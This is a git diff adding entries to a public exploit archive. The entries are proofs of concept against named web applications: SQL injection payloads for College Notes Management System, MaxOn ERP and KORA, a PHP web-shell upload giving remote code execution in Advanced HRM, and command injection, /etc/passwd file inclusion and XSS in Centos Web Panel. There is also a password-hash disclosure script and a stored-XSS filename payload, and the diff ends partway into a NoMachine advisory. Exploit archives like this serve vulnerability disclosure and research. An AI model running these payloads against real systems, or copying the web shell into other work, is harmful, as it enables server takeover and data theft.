+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+ 
+/* `exploitdb`.`ms_user` */
+$ms_user = array(
+  array('use_id' => '1testdb','use_name' => '1testdb','rol_id' => 'ADMIN','pwd' => '*6CC4E8CFFEAF202D7475BC906612F9A29A9C8117')
+);
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/45603.txt b/exploits/php/webapps/45603.txt
new file mode 100644
index 000000000..ac03c98fb
--- /dev/null
+++ b/exploits/php/webapps/45603.txt
@@ -0,0 +1,55 @@
+# Exploit Title: College Notes Management System 1.0 - 'user' SQL Injection
+# Dork: N/A
+# Date: 2018-10-15
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://anirbandutta.ml/
+# Software Link: https://sourceforge.net/projects/college-notes-management/
+# Software Link: https://github.com/anirbandutta9/College-Notes-Gallery
+# git clone https://git.code.sf.net/p/college-notes-management/code college-notes-management-code
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://192.168.1.27/[PATH]/login.php
+# login.php
+# ......
+# if (isset($_POST['login'])) {
+#   $username  = $_POST['user'];
+#   $password = $_POST['pass'];
+#   mysqli_real_escape_string($conn, $username);
+#   mysqli_real_escape_string($conn, $password);
+# $query = "SELECT * FROM users WHERE username = '$username'";
+# $result = mysqli_query($conn , $query) or die (mysqli_error($conn));
+# if (mysqli_num_rows($result) > 0) {
+#   while ($row = mysqli_fetch_array($result)) {
+#     $id = $row['id'];
+#     $user = $row['username'];
+#     $pass = $row['password'];
+#     $name = $row['name'];
+# ......
+
+POST /[PATH]/login.php HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 240
+user='%20aND%20(SeleCT%207804%20FroM(SeleCT%20COUNT(*),ConCaT((SeleCT%20(ELT(7804=7804,1))),ConCaT_WS(0x203a20,usER(),DaTaBaSE(),VERSIon()),FloOR(RaND(0)*2))x%20FroM%20INFORMaTIon_SCHEMa.PLugINS%20GroUP%20BY%20x)a)--%20Efe&pass=&login=login
+HTTP/1.1 200 OK
+Date: Sat, 15 Oct 2018 00:51:03 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=b6mgibtddijtde10ti6umf9kc5; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 1843
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45604.txt b/exploits/php/webapps/45604.txt
new file mode 100644
index 000000000..442b06c7c
--- /dev/null
+++ b/exploits/php/webapps/45604.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Advanced HRM 1.6 - Remote Code Execution
+# Google Dork: intext:"Advanced HRM" 
+# Date: 2018-10-06
+# Exploit Author: Renos Nikolaou
+# Vendor Homepage: https://coderpixel.com/
+# Software Link: https://codecanyon.net/item/advanced-hrm/17767006
+# Version: 1.6
+# Tested on: Windows 10
+# CVE: N/A
+# Description : Advanced HRM 1.6 allows users to upload arbitrary files which 
+# leads to a remote command execution on the remote server.
+
+# PoC
+# 1) Create a php file with the below code:
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+
+# 2) Login to Advanced HRM portal as low priviliage user
+# 3) At the right hand side go to Update Profile --> Change Picture ( http://domain/hrm/user/edit-profile )
+# 4) Click Browse and upload your file containing the PHP code mentioned at step 1. 
+# 5) Click Update
+# 6) Right click at the Profile image and select Copy image Location
+# 7) Paste the URL into your browser. Will be similar to: http://domain/hrm/assets/employee_pic/cmd.php
+# 8) Verify the exploit: http://domain/hrm/assets/employee_pic/cmd.php?cmd=id
+
+# The request:
+===================
+
+POST /hrm/user/update-user-avatar HTTP/1.1
+Host: domain
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://domain/hrm/user/edit-profile
+Content-Type: multipart/form-data; boundary=---------------------------6610657524685
+Content-Length: 378
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------6610657524685
+Content-Disposition: form-data; name="image"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+<?php $cmd=$_GET['cmd']; system($cmd); ?>
+
+-----------------------------6610657524685
+Content-Disposition: form-data; name="_token"
+
+yWFLEpnGV1n5OzK7sAPWg6UVJG02Q
+-----------------------------6610657524685--
\ No newline at end of file
diff --git a/exploits/php/webapps/45605.txt b/exploits/php/webapps/45605.txt
new file mode 100644
index 000000000..9d501bcb1
--- /dev/null
+++ b/exploits/php/webapps/45605.txt
@@ -0,0 +1,118 @@
+# Exploit Title: MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
+# Dork: N/A
+# Date: 2018-10-15
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.talagasoft.com
+# Software Link: http://demo.maxonerp.com/
+# Software Download: https://datapacket.dl.sourceforge.net/project/maxon/maxon.rar
+# Version: 8.x-9.x
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# Description
+# All users can run sql injection codes.
+# 
+# [PATH]/pos/controllers/User.php Line:350
+# [PATH]/application/controllers/User.php Line:414
+# function log_activity(){
+# 	$sql="select * from syslog where 1=1";
+# 	$nomor="";$jenis="";$user="";
+# 	if($this->input->post()){
+# 		if($nomor=$this->input->post('nomor')){
+# 			if($nomor!="")$sql.=" and no_bukti='$nomor'";
+# 		}
+# 		if($user=$this->input->post('user')){
+# 			if($user!="")$sql.=" and userid='$user'";
+# 		}
+# 		if($jenis=$this->input->post('jenis')){
+# 			if($jenis!="")$sql.=" and jenis_cmd='$jenis'";
+# 		}
+# 		
+# 	}
+# 	$sql.=" order by tgljam desc limit 1000";
+# 	$data["user"]=$user;
+# 	$data["nomor"]=$nomor;
+# 	$data["jenis"]=$jenis;
+# 	
+# 	$data['syslog']=$this->db->query($sql);
+# 	$this->template->display("log_list",$data);
+# }
+
+# POC: 
+# 1)
+# http://TARGET/[PATH]/index.php/user/log_activity
+
+POST /index.php/user/log_activity HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 253
+nomor=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
+HTTP/1.1 500 Internal Server Error
+Date: Sat, 15 Oct 2018 00:22:45 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+X-Powered-By: PleskLin
+Connection: close
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://TARGET/[PATH]/index.php/user/log_activity
+
+POST /index.php/user/log_activity HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 252
+user=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
+HTTP/1.1 500 Internal Server Error
+Date: Sat, 15 Oct 2018 00:29:02 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+X-Powered-By: PleskLin
+Connection: close
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 3)
+# http://TARGET/[PATH]/index.php/user/log_activity
+
+POST /index.php/user/log_activity HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: ci_session=3ba3e8a3b82a8e489cd16703fa5d0d327b84074c
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 253
+jenis=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
+HTTP/1.1 500 Internal Server Error
+Date: Sat, 15 Oct 2018 00:35:52 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+X-Powered-By: PleskLin
+Connection: close
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
\ No newline at end of file
diff --git a/exploits/php/webapps/45610.txt b/exploits/php/webapps/45610.txt
new file mode 100644
index 000000000..51de30ea7
--- /dev/null
+++ b/exploits/php/webapps/45610.txt
@@ -0,0 +1,172 @@
+# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities
+# Exploit Author: Seccops - Siber Güvenlik Hizmetleri (https://seccops.com)
+# Vendor Homepage: http://centos-webpanel.com/
+# Software Link: http://centos-webpanel.com/system-requirements
+# Version: 0.9.8.480
+# Tested on: Centos 7
+# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection
+# CVE: -
+  
+### Vulnerability Name: Command Injection ###
+ 
+1)
+Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x  
+Parameter Name: service_start  
+Parameter Type: GET  
+Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx 
+ 
+HTTP Request:
+ 
+GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1
+Host: localhost:2030
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
+Referer: http://localhost:2030/admin/
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+ 
+Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239.
+ 
+HTTP Response:
+ 
+HTTP/1.1 200 OK
+Server: cwpsrv
+X-Powered-By: PHP/7.0.24
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Mon, 01 Oct 2018 21:06:42 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+ 
+    HTML Content:
+ 
+        <div class='alert alert-warning'>
+                    <button type='button' class='close' data-dismiss='alert'>×</button>
+                    <strong>WARNING!</strong> <pre>268409239
+        sh: x.service: command not found
+        </pre><br>
+ 
+2)
+Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x  
+Parameter Name: service_restart  
+Parameter Type: GET  
+Attack Pattern: sshd%3bexpr+268409241+-+2%3bx
+ 
+3)
+Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x  
+Parameter Name: service_fullstatus  
+Parameter Type: GET  
+Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx 
+ 
+4)
+Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x  
+Parameter Name: service_stop  
+Parameter Type: GET  
+Attack Pattern: named%3bexpr+268409241+-+2%3bx
+ 
+### Vulnerability Name: Local File Inclusion ###
+ 
+1)
+Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd  
+Parameter Name: file  
+Parameter Type: GET  
+Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd  
+ 
+HTTP Request:
+ 
+GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: localhost:2030
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D
+Referer: http://localhost:2030/admin/index.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+ 
+HTTP Response:
+ 
+HTTP/1.1 200 OK
+Server: cwpsrv
+X-Powered-By: PHP/7.0.24
+Connection: keep-alive
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Mon, 01 Oct 2018 20:45:19 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+ 
+    HTML Content:
+        File info <a href='index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd&stats=yes'>[stats]</a>:<pre>-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd
+        </pre><h3>Contents of File: /../../../../../../../../../../../etc/passwd</h3>
+            <form action='' method= 'post'>
+            <textarea id='textarea' name='newd' cols='100%' rows='50'>root:x:0:0:root:/root:/bin/bash
+        bin:x:1:1:bin:/bin:/sbin/nologin
+        daemon:x:2:2:daemon:/sbin:/sbin/nologin
+        adm:x:3:4:adm:/var/adm:/sbin/nologin
+        lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+        sync:x:5:0:sync:/sbin:/bin/sync
+        etc...
+        
+### Vulnerability Name: Cross-site Scripting & Frame Injection ###
+ 
+1)
+Proof URL: http://localhost:2030/admin/fileManager2.php?frame=3&action=8&cmd_arg=design&fm_current_dir=<scRipt>alert(1)</scRipt>  
+Parameter Name: fm_current_dir  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+2)
+Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&file=/etc/sysconfig/selinux  
+Parameter Name: module  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+3)
+Proof URL: http://localhost:2030/admin/index.php?service_start=<scRipt>alert(1)</scRipt>  
+Parameter Name: service_start  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+4)
+Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=<scRipt>alert(1)</scRipt>  
+Parameter Name: service_fullstatus  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+5)
+Proof URL: http://localhost:2030/admin/index.php?service_restart=<scRipt>alert(1)</scRipt>  
+Parameter Name: service_restart  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+6)
+Proof URL: http://localhost:2030/admin/index.php?service_stop=<scRipt>alert(1)</scRipt>  
+Parameter Name: service_stop  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+7)
+Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=<scRipt>alert(1)</scRipt>  
+Parameter Name: file  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
+ 
+8)
+Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&dir=/var/log  
+Parameter Name: module  
+Parameter Type: GET  
+Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e
+Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e
\ No newline at end of file
diff --git a/exploits/php/webapps/45612.php b/exploits/php/webapps/45612.php
new file mode 100644
index 000000000..1096d3be2
--- /dev/null
+++ b/exploits/php/webapps/45612.php
@@ -0,0 +1,60 @@
+<?php
+# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - User Information Disclosure
+# Dork: N/A
+# Date: 2018-10-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://geoffpartridge.net/
+# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
+# Version: 7.0a-7.0b
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+header ('Content-type: text/html; charset=UTF-8');
+
+$urlemiz= "http://192.168.1.27/[PATH]/";
+$yuk="server_user.php?sEcho=10&iColumns=10&iDisplayStart=0&iDisplayLength=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSearchable_3=0";
+$jsonveri = file_get_contents($urlemiz.$yuk);
+$ver = json_decode($jsonveri,true);
+echo "<pre>\n";
+print_r($ver);
+echo "\n</pre>";
+/**
+Array
+(
+    [sEcho] => 10
+    [iTotalRecords] => 3
+    [iTotalDisplayRecords] => 3
+    [aaData] => Array
+        (
+            [0] => Array
+                (
+                    [0] => testdb1
+                    [1] => testdb1
+                    [2] => ADMIN
+                    [3] => *6CC4E8CFFEAF202D7475BC906612F9A29A9C8117
+                )
+
+            [1] => Array
+                (
+                    [0] => ADMIN
+                    [1] => admin
+                    [2] => ADMIN
+                    [3] => *4ACFE3202A5FF5CF467898FC58AAB1D615029441
+                )
+
+            [2] => Array
+                (
+                    [0] => STAFF
+                    [1] => Staff
+                    [2] => VIEW
+                    [3] => 
+                )
+
+        )
+
+)
+ */
+?>
\ No newline at end of file
diff --git a/exploits/php/webapps/45613.txt b/exploits/php/webapps/45613.txt
new file mode 100644
index 000000000..203b104f7
--- /dev/null
+++ b/exploits/php/webapps/45613.txt
@@ -0,0 +1,38 @@
+# Exploit Title: KORA 2.7.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-10-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.matrix.msu.edu/
+# Software Link: https://sourceforge.net/projects/kora/files/latest/download
+# Version: 2.7.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# http://localhost/[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=[SQL]&keywords=1
+# 
+# (CASE WHEN (22=22) THEN 22 ELSE 1*(SELECT 22 FROM DUAL UNION SELECT 66 FROM DUAL) END)
+# 
+# 1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
+# 
+GET /[PATH]/ajax/control.php?action=assocSearch&pid=1&sid=1&cid=-1)+UNION+ALL+SELECT+null,null,null,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-&keywords=1 HTTP/1.1
+Host: 192.168.1.27
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 13 Oct 2018 02:01:22 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=pa377tajtaocbeauhd67llk8l4; path=/
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 536
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+#
\ No newline at end of file
diff --git a/exploits/php/webapps/45592.txt b/exploits/ruby/webapps/45592.txt
similarity index 100%
rename from exploits/php/webapps/45592.txt
rename to exploits/ruby/webapps/45592.txt
diff --git a/exploits/ruby/webapps/45601.txt b/exploits/ruby/webapps/45601.txt
new file mode 100644
index 000000000..a29f3d474
--- /dev/null
+++ b/exploits/ruby/webapps/45601.txt
@@ -0,0 +1,44 @@
+# Exploit Title: AlchemyCMS 4.1 - Cross-Site Scripting
+# Date: 2018-10-14 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://alchemy-cms.com/
+# Software Link : https://github.com/AlchemyCMS/alchemy_cms
+# Software : AlchemyCMS
+# Version : 4.1-stable
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# A Stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS via the /admin/pictures image field.
+ 
+# HTTP POST Request :
+
+POST /admin/pictures HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://TARGET/admin/pages/80/edit
+X-CSRF-Token: E6zZ6vohGua9Q0arzQVTUTmq/fJw48xBnkmfQeYxILYtmRAhDcxkaV5FeGyajgOtSXMs7r9xms7Wo44PEP9HTg==
+X-Requested-With: XMLHttpRequest
+Content-Length: 1574870
+Content-Type: multipart/form-data; boundary=---------------------------10875577401849011681645409128
+Cookie: _alchemy_demo_session=%2BSKdSGUIZALtIkYucZKu36eXcVTh4kSCFKjcxqLyFnd%2B5C87xtdx6%2B4Zkjy31YpXRzXI1nwu3BsIvI9v6eYio%2BOh1S3Kb1wd3YcARJTGJeK8ByX9N45trldIwmxK09FqDTMv897K3%2F%2Fe05YiJUEwz2jGkuXkiaxk37AHmjuJNtSNwLfGwAakOWN%2FKQvqAbl%2BMWV9crpeUuq66p6%2Bar1WmGmRcNDqUcfnDFfLmNa8%2BlCBNjieI5N0kpAv2xBJ30EZqoxee13TmKhvPoU4m3UehLKToa8gW5tCQQy7N3BF6ipZa5H1l16%2FxzwPEJl37F3T5%2F%2FkFr4JOxtYSiH9Nd1itpJjMBSZkGAou49SZoBq%2F23r%2BbENN81HrstL2TlaHkxeFdivOnAjBgwpst1qj570WU22FOQeKo80fWnARs23lCHAJy2RyY8dENcpagIQUgdbxqlCaEDqcUnnroZj0g8mhjG%2FdD2cLdym3usSVBmLoiVIPTcHf5T%2FavLUpF6PC0hUwgNEwgNZKzunlPl8tr17e9t9--RjgT8BiSM30kK4WY--s%2BPgcdnz62DCJTK14z5aag%3D%3D; __atuvc=3%7C42; __atuvs=5bc38ae909d900c3002
+Connection: close
+
+-----------------------------10875577401849011681645409128
+Content-Disposition: form-data; name="utf8"
+
+✓
+-----------------------------10875577401849011681645409128
+Content-Disposition: form-data; name="authenticity_token"
+
+GqjmyJ8FM+6rE6IIK5Or6Znszlg8ilvkUKsYJsqT3l3Cl7GAKn8L6xoCio55o9IaxztHwOKOSsRHz5vb4LTOGA==
+-----------------------------10875577401849011681645409128
+Content-Disposition: form-data; name="picture[upload_hash]"
+
+2507832911685091350
+-----------------------------10875577401849011681645409128
+Content-Disposition: form-data; name="picture[image_file]"; filename="\"><img src=x onerror=alert(\"ismailtasdelen\")>.jpg"
+Content-Type: image/jpeg
\ No newline at end of file
diff --git a/exploits/windows/local/45583.txt b/exploits/windows/local/45583.txt
index 4b32725f8..46134159d 100644
--- a/exploits/windows/local/45583.txt
+++ b/exploits/windows/local/45583.txt
@@ -9,6 +9,7 @@
 # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
 # https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
 # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
+# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533) 
 
 # Description
 # This vulnerability allows remote attackers to disclose sensitive information on vulnerable 
diff --git a/exploits/windows/local/45585.txt b/exploits/windows/local/45585.txt
index f965bc380..9d4829155 100644
--- a/exploits/windows/local/45585.txt
+++ b/exploits/windows/local/45585.txt
@@ -9,6 +9,7 @@
 # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
 # https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
 # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527
+# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527) 
 
 # Description
 # This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations 
diff --git a/exploits/windows/local/45587.txt b/exploits/windows/local/45587.txt
index 91a3726c7..cfe375d7e 100644
--- a/exploits/windows/local/45587.txt
+++ b/exploits/windows/local/45587.txt
@@ -9,6 +9,8 @@
 # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
 # https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
 # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532
+# The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532) 
+# so this is marked as verified
 
 # Security Issue
 # This vulnerability allows remote attackers to disclose sensitive information on 
diff --git a/exploits/windows/remote/45611.c b/exploits/windows/remote/45611.c
new file mode 100644
index 000000000..14a28cc0d
--- /dev/null
+++ b/exploits/windows/remote/45611.c
@@ -0,0 +1,111 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/NOMACHINE-TROJAN-FILE-REMOTE-CODE-EXECUTION.txt
+[+] ISR: ApparitionSec          
+ 
+Greetz: ***Greetz: indoushka | Eduardo ***
+
+[Vendor]
+www.nomachine.com
+
+
+[Product]
+NoMachine  <= v5.3.26
+
+NX technology, developed by NoMachine, and commonly known as "NX" is a proprietary computer program that provides desktop and remote access.
+It consists of a suite of products for desktop virtualization and application delivery for servers, and client software.
+
+
+
+[Vulnerability Type]
+Trojan File Remote Code Execution
+
+
+[Affected Component]
+wintab32.dll
+
+
+[CVE Reference]
